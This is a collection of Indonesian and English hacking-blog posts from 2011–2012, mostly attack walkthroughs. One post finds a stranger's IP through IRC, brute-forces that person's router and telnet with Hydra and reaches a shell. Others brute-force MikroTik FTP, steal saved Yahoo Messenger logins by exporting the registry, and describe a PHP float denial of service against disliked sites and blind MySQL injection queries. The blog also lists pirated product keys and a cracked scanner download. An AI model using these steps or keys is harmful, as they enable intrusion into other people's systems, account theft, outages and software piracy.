Share My Application

Hacking Password Mikrotik - Part 2

noreply@blogger.com (monyet_nyasar) — Fri, 27 Jan 2012 14:32:00 PST

Hacking password Mikrotik secara langsung dengan memanfaatkan titik terlemah

Tidak ada sistem yang aman 100%, karena begitu banyak kemungkinan jika kita melihat dari berbagai sisi, sebelumnya penulis menulis artikel untuk hacking mikrotik dari sisi celah di telnet, tapi sebenarnya sama bahayanya dengan telnet yaitu FTP.

Percobaan penulis melakukan serangan BF (brute force) pada http, telnet dan ssh mengalami kegagalan, setelah termenung sekian lama ahkirnya penulis ingat serangan BF pada FTP di waktu sebelumnya, ahkirnya penulis mencoba melakukan BF pada FTP dan hasilnya ternyata sukses. Hmm username dan password untuk http, telnet, ssh, telnet adalah sama, satu celah kena maka semua kena, jadi?

Dari sisi kompatibilitas mikrotik dapat diancungi jempol tapi akibat dari banyaknya kompatibilitas yang ada dapat membawa ancaman lebih besar, seperti pada telnet yang penulis bahas dan praktek diartikel yang sebelumnya.

Oke, kita langsung praktek saja, kita periksa port yang terbuka di mikrotik

C:\Documents and Settings\serverdata>nmap -A 192.168.1.174

Starting Nmap 5.21 ( http://nmap.org ) at 2011-11-07 15:36 Pacific Standard Time

Nmap scan report for 192.168.1.174
Host is up (0.00013s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp MikroTik router ftpd 3.20
22/tcp open ssh OpenSSH 2.3.0 mikrotik 2.9 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 1024 c6:5e:04:d3:12:db:1d:98:c9:17:e2:98:77:d4:39:ba (RSA1)
|_1024 76:68:bc:ee:e3:40:f5:6b:72:ea:44:55:df:86:06:ec (DSA)
23/tcp open telnet Linux telnetd
80/tcp open http MikroTik router http config
|_html-title: mikrotik routeros > administration
2000/tcp open winbox MikroTik WinBox management console
8080/tcp open http-proxy Mikrotik http proxy
8291/tcp open unknown
MAC Address: 08:00:27:22:84:F1 (Cadmus Computer Systems)
Device type: media device
Running: Chumby embedded
OS details: Chumby Internet radio
Network Distance: 1 hop
Service Info: OS: Linux; Device: router

HOP RTT ADDRESS
1 0.13 ms 192.168.1.174

OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.00 seconds

Ternyata banyak port dan service yang terbuka di mikrotik.

Oke tidak perlu berpanjang-panjang lebar lagi, kita langsung hack saja mikrotik target.

C:\Documents and Settings\serverdata>

H:\hydra>hydra -l admin -P kamus.txt 192.168.1.174 ftp
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-11-07 14:39:20
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.174 login: admin password: jagoan
[STATUS] attack finished for 192.168.1.174 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-11-07 14:39:26

Binggo, password mikrotik sudah didapat, kita coba masuk lewat web.

Saat login dan exploitasi yang dapat dilakukan.
Menghajar para pengguna jaringan di mikrotik dengan mengarahkan DNS Servernya ke DNS Server milik kita, ya samalah tekniknya dengan teknik di artikel sebelumnya yang penulis tulis untuk poisoning DNS para pengguna yang menggunakan DHCP router.

Terbatas di web, pakai winbox saja dan login pakai pakai password yang kita hack dari FTP sebelumnya biar lebih banyak option lagi, jika ingin mengganti password router password mikrotik di winbox maka contohnya klik saja password dan muncul form input untuk password lama dan password baru.

sekian dulu, cayooo . . . .

Kaspersky Keys Kis Kav Pure 25/01/2012

noreply@blogger.com (monyet_nyasar) — Thu, 26 Jan 2012 23:10:10 PST

Kaspersky Keys Kis Kav Pure

How to activate Kaspersky license using a key file :

1. Open Kaspersky License Manager (from lower right corner).

2. Click ‘Activate the application with a new license’ button. (Delete any trial key first, by clicking the red X next to the key).

3. Disable your internet connection (either disable Network adapter from control panel or turn off your modem/router).

4. Select ‘Activate commercial version’ and enter the activation license code as 11111-11111-11111-1111X
or select ‘Activate trial license’.

5. Click Next, an error dialog box will open as shown below:

6. Click Ok and you will now get the option to activate kaspersky using a key file.

7. Browse to the key location and activate kaspersky.

DOWNLOAD :
http://www.filesin.com/76029126737/download.html

Update Serial Key

noreply@blogger.com (monyet_nyasar) — Mon, 23 Jan 2012 15:16:01 PST

Adobe Dreamweaver Cs5.5
1192-1028-6934-7510-8957-0405

Adobe acrobat pro 9
1118-1905-0841-9679-7056-1416

Microsoft Office Plus 2010
1325-1994-3655-2254-7818-9979
1325-1991-5807-4226-7519-7458
1325-1996-0999-6662-0974-8482
1325-1998-1949-9753-8870-4812
1325-1993-5343-6858-0717-2513
1325-1992-7227-8921-3150-2674

Microsoft Office 2010 Professional Plus
LY57R4-T6C47V-PM1ASS-06WQWB
8F5CS2-Y8F2C5-LCS8VV-P88P8C

Windows 7 Ultimate Product key and default key
Product key: 342DG-6YJR8-X92GV-V7DCV-P4K27
Default Product Key: D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV

Adobe Photoshop Cs5 keys
1330-1270-2109-5153-8837-9231 1330-1953-8438-8500-7117-3533
1330-1158-3088-0438-6574-0867 1330-1361-6670-4304-7886-6688
1330-1241-0674-5648-4729-1904 1330-1397-1014-7571-2817-1355
1330-1250-9206-4495-3796-9368 1330-1331-8999-1502-9478-2917
1330-1281-8916-6015-7348-5124 1325-1558-5864-4422-1094-1126
1325-1958-5864-4422-1094-1178 1330-1615-1663-0498-6205-1791
1330-1953-8438-8500-7117-3533 1330-1158-3088-0438-6574-0867

Microsoft Office 2010 key
P8TFP-JGFMM-XPV3X-3FQM2-8K4RP
MKCGC-FBXRX-BMJX6-F3Q8C-2QC6P

Microsoft Visual Studio 2010 key
YCFHQ-9DWCY-DKV88-T2TMH-G7BHP

Adobe Flash Professional CS4 key
1302-1487-6497-3671-4940-7210

Adobe Flash Professional CS5 key
1302-1323-8855-5177-4480-1518

Adobe Flash Professional CS 5.5 key
1302-1453-0943-6440-5287-2023

Adobe Premiere Pro Cs5
ZQ09GV-ZVHCUT-ZQ065B-EB892Y-KALTDT

Adobe Premiere Pro Cs4
1132-1242-7886-9974-0256-0792

Adobe Premiere Pro Cs3
1E30-AXC1-19M2-94KK-520A-CK81-83E4

Eset Nod32 Antivirus Smart security 4 to 2016
Username: EAV-48894407 : 36pcuuvnjs

Uniblue DriverScanner 2011 key
PS-FAQ2S-KCVE7-3JWEA-YNUK5-X57S9-D25YZ

good luck . . . :)

Hacking Password Modem/Router Speedy

noreply@blogger.com (monyet_nyasar) — Mon, 23 Jan 2012 15:03:48 PST

Hacking password Router Speedy via internet dengan Hydra hingga mendapatkan shell di server yang berada dibelakang router

Apakah anda suka cari target di IRC untuk dihack router speedy atau di PC dibelakang router untuk pentest? Apakah anda masih mengandalkan target yang mengandalkan router speedy dengan keamanan password default yaitu user admin dan password admin ? Kalau anda masih mengandalkan metode serangan password default, maka disini penulis akan memberikan metode tambahan untuk anda yaitu metode brute force.

Disini penulis menggunakan tool Hydra. Hydra adalah tool untuk melakukan hacking password dengan menggunakan metode brute force, dengan anda memiliki kamus kata yang banyak yang dimungkinkan passwordnya ada di dalam kamus tersebut.

Di sini penulis contohkan misal kita join ke mIRC, kita contohkan saja nick ce_imutbgtt, nah whois aja itu nick dan kita akan mendapatkan IPnya.

Tampilan IP setelah di whois.

Setelah kita dapatkan IPnya maka jalankan saja di browser IP address tersebut.

Setelah dijalankan http://180.254.70.135 maka akan tampil form window seperti dibawah ini

menggunakan username admin dan password admin hasilnya adalah gagal maka anda akan dihadapkan pada 2 hal, terus maju atau tinggalkan target.

Jika anda ingin terus maju maka anda dapat menggunakan teknik brute force. Contohnya untuk melakukan exploitasi dengan hydra adalah

H:\hydra>hydra -m / -l admin -P data.txt 180.254.70.135 http-get
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-17 14:27:56
[DATA] 11 tasks, 1 servers, 11 login tries (l:1/p:11), ~1 tries per task
[DATA] attacking service http-get on port 80
[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)
[80][www] host: 180.254.70.135 login: admin password: baseball
Hydra (http://www.thc.org) finished at 2011-10-17 14:27:57

H:\hydra>

Setelah kita masuk ke router dengan password yang didapat, jika kita ingin melakukan hacking server di belakang router maka kita dapat melakukan IP Forwarding dari router ke Server yang berada dibelakang router.

Disini kita tidak tahu IP-IP lokal berapa saja dibelakang router, karena itu kita dapat mengujinya satu persatu dengan melakukan ping walaupun tidak jaminan.

Disini diasumsikan IP Servernya adalah 192.168.1.2 setelah kita ping dapat.

D:\>ping 180.254.70.135

Pinging 180.254.70.135 with 32 bytes of data:

Reply from 180.254.70.135: bytes=32 time<1ms TTL=254
Reply from 180.254.70.135: bytes=32 time=2ms TTL=254
Reply from 180.254.70.135: bytes=32 time=11ms TTL=254
Reply from 180.254.70.135: bytes=32 time<1ms TTL=254

Setelah diping jalan maka kita dapat mencoba melakukan scanning dengan NMAP

C:\>nmap -v -A 180.254.70.135

Starting Nmap 5.21 ( http://nmap.org ) at 2011-10-17 15:28 Pacific Daylight Time

NSE: Loaded 36 scripts for scanning.
Initiating Ping Scan at 15:28
Scanning 180.254.70.135 [4 ports]
Completed Ping Scan at 15:28, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 3.09s elapsed
Initiating SYN Stealth Scan at 15:28
Scanning 180.254.70.135 [1000 ports]
Discovered open port 23/tcp on 180.254.70.135
Discovered open port 80/tcp on 180.254.70.135
Discovered open port 3389/tcp on 180.254.70.135
Discovered open port 21/tcp on 180.254.70.135
Completed SYN Stealth Scan at 15:28, 2.34s elapsed (1000 total ports)

Disini dari scanning dengan NMAP kita mendapatkan adanya port 23 yaitu port untuk telnet server. Dengan aktifnya Telnet Server maka kita dapat melakukan brute force ke server Telnet dengan Hydra.

H:\hydra>hydra -l administrator -P data.txt 180.254.70.135 telnet
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-17 15:21:22
[DATA] 6 tasks, 1 servers, 6 login tries (l:1/p:6), ~1 tries per task
[DATA] attacking service telnet on port 23
[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)
[23][telnet] host: 180.254.70.135 login: administrator password: sepakbola
Hydra (http://www.thc.org) finished at 2011-10-17 15:21:26

Binggo, kita mendapatkan password telnetnya.

Masukkan login dan passwordnya dan kita akan mendapatkan shell dari telnet server. Contohnya :

Setelah kita klik Open. Masukkan login dan passwordnya.

Sip, kita masuk ke shell server.

Untuk download Hydra. http://0xa.li/files/hydra-6.0-windows.zip. Untuk cari kamusnya untuk brute force dapat dicari sendiri di google, jika ingin buat sendiri juga boleh. Cayooo!

Solusi : Pengamanannya jika anda ingin tetap dapat dipanggil router speedynya dari luar, maka anda dapat membuat password yang susah ditebak dengan berbagai kombinasi huruf dan angka yang kompleks tapi tetap mudah diingat. Jika ingin lebih aman lagi ya tidak perlu membuat router speedy bisa diakses dari internet, caranya misal dengan melempar port 80 ke IP lain yang kosong atau tidak dipakai.

Saya tidak bertanggung sama sekali atas semua hal-hal yang diakibatkan oleh artikel ini.

Hacking password mikrotik - part 1

noreply@blogger.com (monyet_nyasar) — Mon, 23 Jan 2012 14:28:29 PST

Hacking password mikrotik memanfaatkan celah pada telnet

Perkembangan remote untuk administrator sudah berkembang pesat, tapi tidak menutup kemungkinan ada administrator mikrotik yang masih menggunakan telnet untuk remote ke mikrotiknya dengan berbagai alasannya seperti misal lebih universal, seperti dimana di windows sudah ada telnet clientnya yang dapat dipanggil tanpa menggunakan tool dari luar dan sebagainya.

Penggunaan telnet pada mikrotik dapat mengakibatkan password mikrotik di sniffing.

Contoh yang penulis lakukan dalam melakukan sniffing password telnet dengan CAIN.

Setelah penulis melakukan poisoning pada IP router mikrotik dan kemudian si administrator melakukan login ke mikrotik melalui telnet, penulis cukup masuk pada bagian passwords lalu telnet akan tampil baris seperti dibawah ini lalu penulis lakukan klik kanan lalu view.

Tampilannya setelah dilakukan view.

mendapatkan password mikrotik dan anda tinggal login dengan password tersebut untuk melakukan login.

Solusi : Untuk mencegah terjadinya tindakan pengambilan password dengan menggunakan sniffing maka gunakan SSH untuk remote secara console.

Cayoo . . . .

Trick Hack Password Yahoo Messenger Lebih Mudah

noreply@blogger.com (monyet_nyasar) — Mon, 23 Jan 2012 13:57:27 PST

User pada umumnya malas mengetikkan password ketika akan login ke Yahoo Messenger, salah satu cara yang praktis adalah melakukan centang pada “Remember my ID & password”. Hal ini dilakukan supaya jika ingin chat, maka tinggal klik “sign in” saja. nga perlu repot ketik password lagi.
Namun pada kasus umum lainnya adalah ketika user lupa akan PASSWORD ID-nya karena saking terbiasa dengan keenakkan fitur “mengingat password” YM. atau celakanya ada juga orang lain yang sering menggunakan komputer dimana seseorang sudah melakukan “Remember my ID & password” pada komputer tersebut.
Meskipun password tersimpan dalam bentuk terenkripsi, kita atau orang lain juga bisa berchatting ria menggunakan account YM tersebut tanpa menggunakan software pembobol password atau keylogger apapun.
Nah.. beginilah kira kira meng-hack akun Yahoo messenger secara manual.
Jika di sebuah komputer (saya asumsikan sebagai komputer A) terinstall YM versi 7 keatas (versi 7,8,9,10,11) dengan tanda centang “Remember my ID & password”, maka anda bisa langsung jalankan registry editor (windows + r dan ketik regedit) dan masuk ke HKEY_CURRENT_USER\Software\yahoo\pager

kita akan menemukan dua buah “String Value” dibawah ini
Yahoo! User ID = airin_hero88
ETS = XxXXxXXXXxxXXXSENSORBRO-XXXXXXxxxXXXXXXX
string ETS dan Yahoo! User ID adalah ID Yahoo dan password terenkripsi dimana setiap komputer berbeda beda. Anda tidak bisa langsung memasukkan/mengedit hanya kedua file tersebut. Namun harus menyimpan semua data registry.

masuk ke HKEY_CURRENT_USER\Software\yahoo\ dan export registry tersebut. Klik kanan pilih export dan save menjadi ympass.reg ke flash disk.
Pada komputer yang lain (saya asumsikan sebagai kompuer B), matikan dulu Yahoo Mesennger jika saat itu sedang aktif, lalu klik dua kali pada file ympass.reg yang sudah anda simpan di flash disk
Jalankan Yahoo Messenger pada komputer B…. Selamat anda berhasil sign in sebagai akun YM komputer A tanpa perlu mengetahui password tersebut.
Trik ini mungkin bermanfaat bagi anda sebagai pemilik akun YM yang lupa password tapi ingin ber-YM-an di komputer lain. atau sebaliknya jika jatuh di tangan orang lain, maka dia bisa menjadi akun anda bahkan membaca isi inbox e-mail.

Acunetix Web Vulnerability Scanner 7.0 Full Version (Crack + Activator)

noreply@blogger.com (monyet_nyasar) — Mon, 23 Jan 2012 13:40:41 PST

Acunetix Web Vulnerability Scanner 7.0 Full Version (Crack + Activator)
Download via Torrent (http://www.utorrent.com)
Installation
Unpack, install, Replace wvs.exe, activation.exe with the cracked one. Start activation.exe enter something you like, activate it and click finish. Start wvs.exe and have fun.
Enjoy . . .

Audit your website security with Acunetix Web Vulnerability Scanner
As many as 70% of web sites have vulnerabilities that could lead to the theft of sensitive corporate data such as credit card information and customer lists.
Hackers are concentrating their efforts on web-based applications – shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access to backend corporate databases and also allow hackers to perform illegal activities
using the attacked site. A victim’s website can be used to launch criminal activities such as hosting phishing sites or to transfer illicit content, while abusing the website’s bandwidth and making its owner liable for these unlawful acts.
Firewalls, SSL and locked-down servers are futile against web application hacking!
Web application attacks, launched on port 80/443, go straight through the firewall, past operating system and network level security, and right into the heart of your application and corporate data. Tailor-made web applications are often insufficiently tested, have undiscovered vulnerabilities and are therefore easy prey for hackers.
Find out if your web site is secure before hackers download sensitive data, commit a crime using your web site as a launch pad, and endanger your business. Acunetix Web Vulnerability Scanner crawls your web site, automatically analyzes your web applications and finds perilous SQL injection, Cross site scripting and other vulnerabilities that expose your on line business. Concise reports identify where web applications need to be fixed, thus enabling you to protect your business from impending hacker attacks!
Acunetix – a world-wide leader in web application security
Acunetix has pioneered the web application security scanning technology: Its engineers focused on web security as early as 1997 and developed an engineering lead in web site analysis and vulnerability detection.

Acunetix Web Vulnerability Scanner includes many innovative features:
* An automatic Javascript analyzer allowing for security testing of Ajax and Web 2.0 applications
* Industry’s most a dvanced and in-depth SQL injection and Cross site scripting testing
* Visual macro recorder makes testing web forms and password protected areas easy
* Extensive reporting facilities including VISA PCI compliance reports
* Multi-threaded and lightning fast scanner crawls hundreds of thousands of pages with ease
* Automate File Upload Forms vulnerability testing
* Acunetix crawls and analyzes websites including flash content, SOAP and AJAX
* Innovative AcuSensor Technology that allows accurate scanning for many vulnerabilities
* Port scanning and network alerts against the web server for complex security checks
* Version Check
o Vulnerable Web Servers
o Vulnerable Web Server Technologies – such as “PHP 4.3.0 file disclosure and possible code execution.
* Web Server Configuration Checks
o Checks for Web Servers Problems – Determines if dangerous HTTP methods are enabled on the web server (e.g. PUT, TRACE, DELETE)
o Verify Web Server Technologies
* Parameter Manipulation
* Cross-Site Scripting (XSS) – over 40 different XSS variations are tested.
* SQL Injection
* Code Execution
* Directory Traversal
* File Inclusion
* Script Source Code Disclosure
* CRLF Injection
* Cross Frame Scripting (XFS)
* PHP Code Injection
* XPath Injection
* Path Disclosure (Unix and Windows)
* LDAP Injection
* Cookie Manipulation
* Arbitrary File creation (AcuSensor Technology)
* Arbitrary File deletion (AcuSensor Technology)
* Email Injection (AcuSensor Technology)
* File Tampering (AcuSensor Technology)
* URL redirection
* Remote XSL inclusion
# MultiRequest Parameter Manipulation
* Blind SQL/XPath Injection
# File Checks
* Checks for Backup Files or Directories – Looks for common files (such as logs, application traces, CVS web repositories)
* Cross Site Scripting in URI
* Checks for Script Errors
# File Uploads
* Unrestricted File uploads Checks
# Directory Checks
* Looks for Common Files (such as logs, traces, CVS)
* Discover Sensitive Files/Directories
* Discovers Directories with Weak Permissions
* Cross Site Scripting in Path and PHPSESSID Session Fixation.
* Web Applications
* HTTP Verb Tampering
# Text Search
* Directory Listings
* Source Code Disclosure
* Check for Common Files
* Check for Email Addresses
* Microsoft Office Possible Sensitive Information
* Local Path Disclosure
* Error Messages
* Trojan shell scripts (such as popular PHP shell scripts like r57shell, c99shell etc)
# Weak Passwords
* Weak HTTP Passwords
# GHDB Google Hacking Database
* Over 1200 GHDB Search Entries in the Database
# Port Scanner and Network Alerts
* Port scans the web server and obtains a list of open ports with banners
* Performs complex network level vulnerability checks on open ports such as:
o DNS Server vulnerabilities (Open zone transfer, Open recursion, cache poisoning)
o FTP server checks (list of writable FTP directories, weak FTP passwords, anonymous access allowed)
o Security and configuration checks for badly configured proxy servers
o Checks for weak SNMP community strings and weak SSL cyphers
o and many other network level vulnerability checks!
# Other vulnerability tests may also be preformed using the manual tools provided, including:
* Input Validation
* Authentication attacks
* Buffer overflows
* Blind SQL injection
* Sub domain scanning

SOCKS5

noreply@blogger.com (monyet_nyasar) — Tue, 08 Nov 2011 16:00:56 PST

Okay, I just made a PoC library on how to perform SOCKS5 connection(s) in both C# and VB.Net. Here's a code example of how to use it (in VB.Net):

Imports SOCKS5
Public Class PoC
Public Sub Main()
Dim Target As String = "www.google.com"
Dim Query As String = _
"GET / HTTP/1.1" & vbCrLf & _
"Host: " & Target & vbCrLf &; vbCrLf
Dim Tunnel As New SOCKS5("1.2.3.4", 1080, Target, 80)
Dim Socket As New Net.Sockets.Socket( _
Net.Sockets.AddressFamily.InterNetwork, _
Net.Sockets.SocketType.Stream, _
Net.Sockets.ProtocolType.Tcp)
Tunnel.Connect(Socket)
Socket.Send(Text.Encoding.ASCII.GetBytes(Query))
'...
End Sub
End Class

I hope you'll get some use out of it!
Also, here's the download link: SOCKS5.rar

Description: Allows you to tunnel your streams or sockets through a SOCKS5 server in .NET.
Version: 1.0
Reference(s): RFC1928
Language: VB.Net/C#, Requires .Net Framework 3.5

good luck . . . :)

PHP Float DoS <= 5.3.X

noreply@blogger.com (monyet_nyasar) — Thu, 20 Oct 2011 14:18:36 PDT

I'm not sure if you've heard it or not, it's actually "rather old" news now, but PHP 5.3.X suffers from a floating-point denial of service.
If the PHP interpreter tries to parses a specific number, the fork/thread (?) simply hangs and starts consuming CPU resources.

The original advisory states the following snippet:

---------------------------

-------------------------

---------------------------

------------------------

The exploit is self explaining, all you have to do is to find a numeric variable on a site you're pissed enough at. Eg:

http://website.com/index.php?id=7

Replace the id variable with 2.2250738585072011e-308 and watch your success when the server doesn't respond with a page.
This doesn't kill the server - but it do consume alot of CPU resources.

Your best approach is to send several requests (code something will you?) which sends either HTTP POST or GET requests towards the server.
It surely wont take long before it goes down completely.

Here's a PoC script using several variations of the evil floating-point:

-----------------------

--------------------------------

----------------------------

-----------------------------

That's it! Update your PHP installation (if you haven't already) :)

Faster blind MySQL injection using bit shifting

noreply@blogger.com (monyet_nyasar) — Tue, 08 Nov 2011 16:04:04 PST

While strolling through mysql.com I came across this page.

There you can view the possibility of the bitwise function right shift.

A bitwise right shift will shift the bits 1 location to the right and add a 0 to the front.

Here is an example:

mysql> select ascii(b'00000010');
+--------------------+
| ascii(b'00000010') |
+--------------------+
| 2 |
+--------------------+
1 row in set (0.00 sec)

Right shifting it 1 location will give us:

mysql> select ascii(b'00000010') >> 1;
+-------------------------+
| ascii(b'00000010') >> 1 |
+-------------------------+
| 1 |
+-------------------------+
1 row in set (0.00 sec)

It will add a 0 at the front and remove 1 character at the end.

00000010 = 2
00000010 >> 1 = 00000001
^ ^
added shifted
0

So let's say we want to find out a character of a string during blind MySQL injection and use the least possible amount of requests and do it as soon as possible we could use binary search but that will quickly take a lot of requests.
First we split the ascii table in half and try if it's on 1 side or the other, that leaves us ~64 possible characters.
Next we chop it in half again which will give us 32 possible characters.
Then again we get 16 possible characters.
After the next split we have 8 possible characters and from this point it's most of the times guessing or splitting it in half again.

Let's see if we can beat that technique by optimizing this - but first more theory about the technique I came up with.

There are always 8 bits reserved for ASCII characters.
An ASCII character can be converted to it's decimal value as you have seen before:

mysql> select ascii('a');
+------------+
| ascii('a') |
+------------+
| 97 |
+------------+
1 row in set (0.00 sec)

This will give a nice int which can be used as binary.

a = 01100001

If we would left shift this character 7 locations to the right you would get:

00000000 << first 7 0's in blue; last 0 in red

The first 7 bits are being added by the shift, the last character remains which is 0.

mysql> select ascii('a') >> 7;
+-----------------+
| ascii('a') >> 7 |
+-----------------+
| 0 |
+-----------------+
1 row in set (0.00 sec)

a = 01100001

01100001 >> 7 == 00000000 == 0
01100001 >> 6 == 00000001 == 1
01100001 >> 5 == 00000011 == 3
01100001 >> 4 == 00000110 == 6
01100001 >> 3 == 00001100 == 12
01100001 >> 2 == 00011000 == 24
01100001 >> 1 == 00110000 == 48
01100001 >> 0 == 01100001 == 97

When we did the bitshift of 7 we had 2 possible outcomes - 0 or 1 and we can compare it to 0 and 1 and determine that way if it was 1 or 0.

mysql> select (ascii('a') >> 7)=0;
+---------------------+
| (ascii('a') >> 7)=0 |
+---------------------+
| 1 |
+---------------------+
1 row in set (0.00 sec)

It tells us that it was true that if you would shift it 7 bits the outcome would be equal to 0.
Once again, if we would right shift it 6 bits we have the possible outcome of 1 and 0.

mysql> select (ascii('a') >> 6)=0;
+---------------------+
| (ascii('a') >> 6)=0 |
+---------------------+
| 0 |
+---------------------+
1 row in set (0.00 sec)

This time it's not true so we know the first 2 bits of our character is "01".
If the next shift will result in "010" it would equal to 2; if it would be "011" the outcome would be 3.

mysql> select (ascii('a') >> 5)=2;
+---------------------+
| (ascii('a') >> 5)=2 |
+---------------------+
| 0 |
+---------------------+
1 row in set (0.00 sec)

It is not true that it is 2 so now we can conclude it is "011".
The next possible options are:
0110 = 6
0111 = 7

mysql> select (ascii('a') >> 4)=6;
+---------------------+
| (ascii('a') >> 4)=6 |
+---------------------+
| 1 |
+---------------------+
1 row in set (0.00 sec)

We got "0110" now and looking at the table for a above here you can see this actually is true.
Let's try this on a string we actually don't know, user() for example.

First we shall right shift with 7 bits, possible results are 1 and 0.

mysql> select (ascii((substr(user(),1,1))) >> 7)=0;
+--------------------------------------+
| (ascii((substr(user(),1,1))) >> 7)=0 |
+--------------------------------------+
| 1 |
+--------------------------------------+
1 row in set (0.00 sec)

We now know that the first bit is set to 0.
0???????

The next possible options are 0 and 1 again so we compare it with 0.

mysql> select (ascii((substr(user(),1,1))) >> 6)=0;
+--------------------------------------+
| (ascii((substr(user(),1,1))) >> 6)=0 |
+--------------------------------------+
| 0 |
+--------------------------------------+
1 row in set (0.00 sec)

Now we know the second bit is set to 1.
01??????

Possible next options are:
010 = 2
011 = 3

mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
+--------------------------------------+
| (ascii((substr(user(),1,1))) >> 5)=2 |
+--------------------------------------+
| 0 |
+--------------------------------------+
1 row in set (0.00 sec)

Third bit is set to 1.
011?????

Next options:
0110 = 6
0111 = 7

mysql> select (ascii((substr(user(),1,1))) >> 4)=6;
+--------------------------------------+
| (ascii((substr(user(),1,1))) >> 4)=6 |
+--------------------------------------+
| 0 |
+--------------------------------------+
1 row in set (0.00 sec)

This bit is also set.
0111????

Next options:
01110 = 14
01111 = 15

mysql> select (ascii((substr(user(),1,1))) >> 3)=14;
+---------------------------------------+
| (ascii((substr(user(),1,1))) >> 3)=14 |
+---------------------------------------+
| 1 |
+---------------------------------------+
1 row in set (0.00 sec)

01110???

Options:
011100 = 28
011101 = 29

mysql> select (ascii((substr(user(),1,1))) >> 2)=28;
+---------------------------------------+
| (ascii((substr(user(),1,1))) >> 2)=28 |
+---------------------------------------+
| 1 |
+---------------------------------------+
1 row in set (0.00 sec)

011100??

Options:
0111000 = 56
0111001 = 57

mysql> select (ascii((substr(user(),1,1))) >> 1)=56;
+---------------------------------------+
| (ascii((substr(user(),1,1))) >> 1)=56 |
+---------------------------------------+
| 0 |
+---------------------------------------+
1 row in set (0.00 sec)

0111001?
Options:
01110010 = 114
01110011 = 115

mysql> select (ascii((substr(user(),1,1))) >> 0)=114;
+----------------------------------------+
| (ascii((substr(user(),1,1))) >> 0)=114 |
+----------------------------------------+
| 1 |
+----------------------------------------+
1 row in set (0.00 sec)

Alright, so the binary representation of the character is:
01110010

Converting it back gives us:

mysql> select b'01110010';
+-------------+
| b'01110010' |
+-------------+
| r |
+-------------+
1 row in set (0.00 sec)

So the first character of user() is "r".

With this technique we can assure that we have the character in 8 requests.

Further optimizing this technique can be done.
The ASCII table is just 127 characters which is 7 bits per character so we can assume we will never go over it and decrement this technique with 1 request per character.

Chances are higher the second bit will be set to 1 since the second part of the ASCII table (characters 77-127) contain the characters a-z A-Z - the first part however contains numbers which are also used a lot but when automating it you might just want to try and skip this bit and immediatly try for the next one.

good Luck :)

Google Dorks 2.0

noreply@blogger.com (monyet_nyasar) — Tue, 08 Nov 2011 16:05:13 PST

Google and all of it's services must be the most advanced and handy SaaS-solution(s) ever created.
Google is also known to be the "hackers best friend".
...so why bother to run automated "Google-Dork Scanners" manually, when Google just as well could do the job for you?

After some tinkering, and exploring of the wide range of services Google provides; I came up with something interesting.

So folks, behold.
The Skynet is born.

Here's how it works:

1. Login to your Google-account (or provide an e-mail address).
2. Go to http://www.google.com/alerts.
3. Enter the malicious dork, among other settings.
4. If you got more dorks, go back to to #2.

Simple, clean and easy.
Just (ab)use Google Alerts for your own evil deeds!
(The current trend is cloud-based solutions, so why fight against it?)

Whenever Google finds something matching your dork - you will receive an e-mail notification, telling you what sites it found as well as what it matched on.

The variety of malicious content Google may provide, could range from anything of the following:

* Public Advisories and Vulnerabilities (and well, 0-days if you have any).
* Server-Side Error Messages.
* Files containing logon credentials for various services. (Usernames, Passwords...)
* Footholds. (e.g; Administrative pages)
* Login portals.
* Network and/or Vulnerability logs.
* Online Shopping Information (Customer Data, Suppliers, Credit Cards...)
* Various Online Services (Printers, Surveillance cameras, Routers, SIP-switches...)
* Vulnerable Files & Servers
* Web-Server / OS Fingerprints

With other words, you'll never have to manually scan/query/search again.
Just configure your "Google Alerts"-page, and see the information-flow building up in your e-mails inbox.

What's even more cozy, is the user-friendly feature of allowing your GMAIL to act as a RSS-feed:

https://USERNAME:PASSWORD@gmail.google.com/gmail/feed/atom

...a perfect way to parse the data!

Heres some resources containing various Google dorks (which only may be used for educational purposes!):

* http://www.hackersforcharity.org/ghdb/
* http://www.exploit-db.com/google-dorks/
* http://www.googlebig.com/forum/google-dorks-f-4.html

Now, I'm not saying you should use this technique.
But it could become a serious threat - due to the ease of executing the process.

I hope I've enlightened you a bit! :)

Avira Antivirus Premium 2012 12.0.0.871 Final Incl Keys

noreply@blogger.com (monyet_nyasar) — Tue, 08 Nov 2011 16:15:32 PST

Avira Antivirus Premium 2012 12.0.0.871 Final Incl Keys | 86.85 MB

The Avira AntiVir Premium application was designed to be a comprehensive and flexible tool you can rely on to protect your computer from viruses, malware, unwanted programs, and other dangers.
In a user-defined installation or a modification installation, the following installation modules can be selected,

added

or removed.

AntiVir Premium
This module contains all components required for successful installation of Avira AntiVir Premium.

AntiVir Guard
The AntiVir Guard runs in the background. It monitors and repairs, where necessary, files during operations such as open, write and copy in on-access mode. Whenever a user carries out a file operation (e.g. load document, execute, copy), Avira AntiVir Premium automatically scans

the file

. Renaming a file does not trigger a scan by AntiVir Guard.

AntiVir MailGuard
MailGuard is the interface between your computer and the email server from which your email program (mail client) downloads the emails. MailGuard is connected as a so-called proxy between the

email program

and the

email server

. All incoming emails are routed through this proxy, scanned for viruses and unwanted programs and forwarded to your email program. Depending on the configuration, the program processes the affected emails automatically or asks the user for a certain action.

AntiVir WebGuard
